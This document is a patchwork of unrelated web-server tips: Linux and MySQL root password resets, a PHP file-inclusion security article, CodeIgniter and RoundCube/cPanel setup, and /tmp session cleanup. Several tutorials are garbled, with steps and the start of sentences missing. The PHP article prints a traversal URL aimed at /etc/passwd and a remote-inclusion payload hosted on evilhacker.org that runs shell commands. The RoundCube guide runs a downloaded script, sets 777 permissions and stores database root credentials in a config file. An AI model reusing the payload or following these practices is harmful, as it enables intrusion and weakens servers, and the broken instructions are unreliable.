To perform a system administrator task, you have to know the root password. What happens if you forget your root password? Not to worry. Just reboot your PC and you can reset the root password by following these steps:
Soon you see the graphical boot loader on screen, showing the names of the operating systems you can boot. If your system runs the LILO boot loader, press Ctrl+X, and at the boot prompt type linux single and press Enter. Then proceed to step 4.
GRUB prompts you for commands to add to its default boot command.
single
Linux starts up as usual but runs in single-user mode, which does not require you to log in. After Linux starts, you will see a command-line prompt that ends with a hash mark (#), similar to the following:
sh-2.05b#
passwd command to change the root password as follows:
sh-2.05b# passwd
Changing password for root user.
New password:
root password that you want to use (it doesn’t appear on screen) and then press Enter. Linux asks for the password again, like this:
Retype new password:
If you enter the same password both times, the passwd command changes the root password.
After Linux starts, it displays the familiar login screen. Now you can log in as root with the new password.
‘Like locking your keys in the car, to forget your password after
you’ve spent an hour installing and tweaking a new MySQL server can be
an embarrassment to say the least.’
Fortunately, if you have root access to that computer, all is NOT lost.
Here are the steps to follow when you find yourself in this situation.
1. Kill the server process.
% kill pid
(where pid is the process id. Do not use kill -9 unless absolutely
necessary, as this may damage your table files)
2. Run safe_mysqld with the --skip-grant-tables command line option.
(This instructs the MySQL server to allow unrestricted access to
anyone) NOTE: restrict all remote access before issuing this command
% safe_mysqld --skip-grant-tables
3. Change root password
mysql> use mysql;
mysql> update user set password = password('newpassword') where user = 'root';
4. Disconnect and instruct the mysql server to reload the grants
tables to begin requiring passwords.
% mysqladmin flush-privileges
“That does it — and nobody ever has to know what you did. As for
locking your keys in your car, you’re on your own there.”
A must-have for beginner PHP/MySQL developers.
This article discusses the common threats and challenges of programming secure PHP applications and practical methods for doing so.
Introduction
The goal of this paper is not only to show common threats and challenges of programming secure PHP applications but also to show you practical methods for doing so. The wonderful thing about PHP is that people with little or even no programming experience are able to achieve simple goals very quickly. The problem, on the other hand, is that many programmers are not really conscious of what is going on behind the curtains. Security and convenience do not often go hand in hand — but they can.
Dangers
Files
PHP has some very flexible file handling functions. The include(), require() and fopen() functions accept local path names as well as remote files using URLs. A lot of vulnerabilities I have seen are due to incorrect handling of dynamic file or path names.
Example
A site I will not mention in this article (because the problem still has not been solved) has one script which includes various HTML files and displays them in the proper layout. Have a look at the following URL:
http://example.com/page.php?i=aboutus.html
The variable $i obviously contains the file name to be included. When you see a URL like this, a lot of questions should come to your mind:
* Has the programmer considered directory traversals like i=../../../etc/passwd?
* Does he check for the .html extension?
* Does he use fopen() to include the files?
* Has he thought about not allowing remote files?
In this case, every answer was negative. Time to play! Of course, it is now possible to read all the files the httpd user has read access for. But what is even more exciting is the fact that the include() function is used to include the HTML file. Consider this:
http://example.com/page.php?i=http://evilhacker.org/exec.html
Where exec.html contains a couple of lines of code:
<?php
passthru ('id');
passthru ('ls -al /etc');
passthru ('ping -c 1 evilhaxor.org');
passthru ('echo You have been hax0red | mail root');
?>
I am sure you get the idea. A lot of bad things can be done from here.
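From the defender's side, the questions listed above can be turned into a source audit. The following is an added example, not code from the article: a heuristic shell check that lists include/require/fopen calls whose argument contains a PHP variable. The function names and the sample files are assumptions constructed for the demo.

```sh
#!/bin/sh
# Added example, not code from the article. Heuristic audit: list
# include/require/fopen calls whose argument contains a PHP variable.

# ERE: call name, optional "(", then a "$" before the statement's ";".
DYN_INCLUDE_RE='(include|require)(_once)?[[:space:]]*\(?[^;]*\$|fopen[[:space:]]*\([^;]*\$'

# scan_dynamic_includes DIR -> prints "file:line:source" per finding.
scan_dynamic_includes() {
    # /dev/null forces grep to print file names even for a single file.
    # grep exits non-zero when nothing matches; that is not an error here.
    find "$1" -type f -name '*.php' \
        -exec grep -nE "$DYN_INCLUDE_RE" /dev/null {} + || true
}

# make_sample_tree DIR -> writes constructed sample files for the demo.
make_sample_tree() {
    mkdir -p "$1"
    # Same shape as the page.php described in the article (constructed).
    printf '%s\n' '<?php' 'include($i);' '?>' > "$1/page.php"
    # Fixed file names only: nothing for a visitor to control.
    printf '%s\n' '<?php' "include('header.html');" \
        "require_once 'layout.php';" '?>' > "$1/static.php"
    # Variable path passed to fopen().
    printf '%s\n' '<?php' '$fh = fopen($_GET["f"], "r");' '?>' > "$1/read.php"
}

demo_dir=$(mktemp -d)
make_sample_tree "$demo_dir"
scan_dynamic_includes "$demo_dir"
rm -rf "$demo_dir"
```

Each hit is a place to confirm that the file name is checked against a fixed list of allowed pages before it is used; the pattern is a heuristic and will also flag calls that are already safe.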
The CodeIgniter framework (CI) needs nearly zero configuration. The first step is to put your CI files on your web server; in this example I will be using the web root directory of my web server.
Host : www.johnbernardabella.com
Database : localhost
Username : test
Password : test
Next, we need to modify system\application\config\config.php
Look for :
$config['base_url'] = '';
change to :
$config['base_url'] = "http://www.johnbernardabella.com/"; // because we are using the web root of the server
Then save.
Second, open system\application\config\database.php
$db['default']['hostname'] = "localhost"; //Host of the database
$db['default']['username'] = "test"; //Username of the database
$db['default']['password'] = "test"; //Password of the database
$db['default']['database'] = "test"; // Database Name
$db['default']['dbdriver'] = "mysql"; // Database driver for this example I use mysql
$db['default']['dbprefix'] = ""; // Database prefix
$db['default']['pconnect'] = FALSE; // Connection type (pconnect or connect)
Your CI is now configured and able to connect to the database.
The next topic will be tweaking the default CI configuration.
First, make sure you know your MySQL root password; you have to replace DATABASEPASSWORD with your MySQL root password.
If you have already installed RoundCube, please make sure you remove any traces of it with:
cd /usr/local/cpanel/base
rm -rf roundcube*
mysql -p -e 'drop database roundcube';
chattr -i /usr/local/cpanel/base/frontend/x/webmaillogin.html
chattr -i /usr/local/cpanel/base/webmaillogin.cgi
/scripts/upcp
You will have to specify your root password when prompted.
Now let's download RoundCube and chmod the directories
cd /usr/local/cpanel/base
wget -O roundcube.tar.gz http://heanet.dl.sourceforge.net/sourceforge/roundcubemail/roundcubemail-0.1-rc1.tar.gz
tar -zxvf roundcube.tar.gz
rm -rf roundcube.tar.gz
mv -f roundcubemail-0.1-rc1 roundcube
cd roundcube
chmod -R 777 temp
chmod -R 777 logs
Create the database and install the initial SQL file. The following commands will do this for you.
mysql -e "CREATE DATABASE roundcube;" -pDATABASEPASSWORD
mysql -e "use roundcube; source SQL/mysql.initial.sql;" -pDATABASEPASSWORD
Now let's sort out the configuration
cd config
mv db.inc.php.dist db.inc.php
mv main.inc.php.dist main.inc.php
Now open db.inc.php
nano db.inc.php
Find
$rcmail_config['db_dsnw'] = 'mysql://roundcube:pass@localhost/roundcubemail';
Replace with
$rcmail_config['db_dsnw'] = 'mysql://root:DATABASEPASSWORD@localhost/roundcube';
Now Open main.inc.php
nano main.inc.php
Find
$rcmail_config['default_host'] = '';
Replace with
$rcmail_config['default_host'] = 'localhost';
Now we have to configure cPanel to show RoundCube in the theme. Please note this is for the X theme (default) only! If you use another theme, please skip the next part and see below.
cd /usr/local/cpanel/base/roundcube/skins/default/images/
cp --reply=yes roundcube_logo.png /usr/local/cpanel/base/frontend/x/images/roundcube_logo.png
cp --reply=yes roundcube_logo.png /usr/local/cpanel/base/webmail/x/images/roundcube_logo.png
cd /usr/local/cpanel/base
wget http://www.hostgeekz.com/files/hostgeekz/HGpatch-roundcube-0.1-rc1
patch -p0 < HGpatch-roundcube-0.1-rc1
**NOTE** If you receive a message stating
Reversed (or previously applied) patch detected! Assume -R?
please press N for No as this is because you previously installed roundcube
This will auto do all the necessary changes to roundcube and the X theme.
Once the patch is executed you may now access roundcube via http://yourip/webmail
-----
If you do not use the X theme please do the following
cd /usr/local/cpanel/base
wget http://www.hostgeekz.com/files/hostgeekz/HGpatch-roundcube-NON-X-0.1-rc1
patch -p0 < HGpatch-roundcube-NON-X-0.1-rc1
Then open your webmaillogin.html, please replace YOURTHEME with the name of your theme.
nano /usr/local/cpanel/base/frontend/YOURTHEME/webmaillogin.html
and find
Add Below
***UPDATE***
Remember to chattr +i the files or add the patch to your /scripts/upcp.
chattr +i /usr/local/cpanel/base/frontend/x/webmaillogin.html
chattr +i /usr/local/cpanel/base/webmaillogin.cgi
If you are using cPanel 11, be sure to run the following fix.
wget http://www.hostgeekz.com/files/hostgeekz/cpanel-11-fix.sh
chmod 700 cpanel-11-fix.sh
./cpanel-11-fix.sh
rm -f cpanel-11-fix.sh
That’s it! You may now access roundcube via http://yourip/webmail
I've been handling a web server with more than 1000 websites and lots of unique visitors per month. Sessions are stored on the server's hard drive, and at the end of every month I need to clean them up.
Now I was puzzled by the rm command.
rm -f *
in /tmp/ directory. The terminal choked and gave out:
-bash: /bin/rm: Argument list too long
Apparently there is a maximum number of files that can be passed to rm.
ls -1 | grep sess | wc -l
382611
Wow, 382611 session files! Imagine how long it would take if you have an application that is running with sessions.
The solution for this problem would be :
find . -name 'sess*' -print0 | xargs -0 rm
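A more defensive form of this cleanup for a shared /tmp, as an added example that is not part of the original post: it deletes only regular sess* files directly inside the directory that are older than a chosen age, and it handles file names containing spaces or newlines. The function names and the 24-hour default are assumptions; it needs GNU or BSD find and xargs.

```sh
#!/bin/sh
# Added example, not the post's own command. Needs GNU or BSD find/xargs
# (-maxdepth, -mmin, -print0 and -0 are extensions to POSIX).

# list_stale_sessions DIR MINUTES -> NUL-separated paths of regular files
# named sess* directly inside DIR, last modified more than MINUTES ago.
list_stale_sessions() {
    # -maxdepth 1: stay out of subdirectories other users created in /tmp.
    # -type f: ignore symlinks, directories and sockets with a sess* name.
    find "$1" -maxdepth 1 -type f -name 'sess*' -mmin "+$2" -print0
}

# purge_sessions DIR [MINUTES] -> deletes the stale files, prints the count.
purge_sessions() {
    dir=$1
    age=${2:-1440}    # assumed default: older than 24 hours
    # One NUL per file, so the count is right even for names with newlines.
    count=$(list_stale_sessions "$dir" "$age" | tr -cd '\000' | wc -c | tr -d ' ')
    # xargs -0 splits on NUL only and batches arguments below the kernel's
    # limit, which is what "rm -f *" exceeded; "--" ends rm's options.
    list_stale_sessions "$dir" "$age" | xargs -0 rm -f --
    echo "$count"
}

# Demo on a throwaway directory with constructed files.
demo=$(mktemp -d)
touch -t 200001010000 "$demo/sess_0a1b2c" "$demo/sess with space"
touch "$demo/sess_active"
echo "removed: $(purge_sessions "$demo" 60)"
ls "$demo"
rm -rf "$demo"
```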